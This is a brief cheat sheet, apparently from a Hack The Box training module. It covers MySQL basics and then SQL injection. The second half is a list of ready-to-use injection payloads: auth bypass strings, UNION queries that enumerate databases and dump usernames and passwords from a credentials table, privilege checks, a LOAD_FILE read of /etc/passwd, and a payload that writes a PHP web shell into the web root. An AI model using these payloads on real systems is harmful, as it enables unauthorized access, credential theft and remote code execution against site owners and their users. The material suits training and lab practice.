
3 min read


mysql -u root -h docker.hackthebox.eu -P 3306 -plogin to mysql database
SHOW DATABASESList available databases
USE usersSwitch to database
CREATE TABLE logins (id INT, ...)Add a new table
SHOW TABLESList available tables in current database
DESCRIBE loginsShow table properties and columns
INSERT INTO table_name VALUES (value_1,..)Add values to table
INSERT INTO table_name(column2, ...) VALUES (column2_value, ..)Add values to specific columns in a table
UPDATE table_name SET column1=newvalue1, ... WHERE <condition>Update table values
SELECT * FROM table_nameShow all columns in a table
SELECT column1, column2 FROM table_nameShow specific columns in a table
DROP TABLE loginsDelete a table
ALTER TABLE logins ADD newColumn INTAdd new column
ALTER TABLE logins RENAME COLUMN newColumn TO oldColumnRename column
ALTER TABLE logins MODIFY oldColumn DATEChange column datatype
ALTER TABLE logins DROP oldColumnDelete column
SELECT * FROM logins ORDER BY column_1Sort by column
SELECT * FROM logins ORDER BY column_1 DESCSort by column in descending order
SELECT * FROM logins ORDER BY column_1 DESC, id ASCSort by two-columns
SELECT * FROM logins LIMIT 2Only show first two results
SELECT * FROM logins LIMIT 1, 2Only show first two results starting from index 2
SELECT * FROM table_name WHERE <condition>List results that meet a condition
SELECT * FROM logins WHERE username LIKE 'admin%'List results where the name is similar to a given string

MySQL Operator Precedence

SQL Injection

Auth Bypass
admin' or '1'='1Basic Auth Bypass
admin')-- -Basic Auth Bypass With comments
Auth Bypass Payloads
Union Injection
' order by 1-- -Detect number of columns using order by
cn' UNION select 1,2,3-- -Detect number of columns using Union injection
cn' UNION select 1,@@version,3,4-- -Basic Union injection
UNION select username, 2, 3, 4 from passwords-- -Union injection for 4 columns
DB Enumeration
SELECT @@versionFingerprint MySQL with query output
SELECT SLEEP(5)Fingerprint MySQL with no output
cn' UNION select 1,database(),2,3-- -Current database name
cn' UNION select 1,schema_name,3,4 from INFORMATION_SCHEMA.SCHEMATA-- -List all databases
cn' UNION select 1,TABLE_NAME,TABLE_SCHEMA,4 from INFORMATION_SCHEMA.TABLES where table_schema='dev'-- -List all tables in a specific database
cn' UNION select 1,COLUMN_NAME,TABLE_NAME,TABLE_SCHEMA from INFORMATION_SCHEMA.COLUMNS where table_name='credentials'-- -List all columns in a specific table
cn' UNION select 1, username, password, 4 from dev.credentials-- -Dump data from a table in another database
cn' UNION SELECT 1, user(), 3, 4-- -Find current user
cn' UNION SELECT 1, super_priv, 3, 4 FROM mysql.user WHERE user="root"-- -Find if user has admin privileges
cn' UNION SELECT 1, grantee, privilege_type, is_grantable FROM information_schema.user_privileges WHERE grantee="'root'@'localhost'"-- -Find if all user privileges
cn' UNION SELECT 1, variable_name, variable_value, 4 FROM information_schema.global_variables where variable_name="secure_file_priv"-- -Find which directories can be accessed through MySQL
File Injection
cn' UNION SELECT 1, LOAD_FILE("/etc/passwd"), 3, 4-- -Read local file
select 'file written successfully!' into outfile '/var/www/html/proof.txt'Write a string to a local file
cn' union select "",'<?php system($_REQUEST[0]); ?>', "", "" into outfile '/var/www/html/shell.php'-- -Write a web shell into the base web directory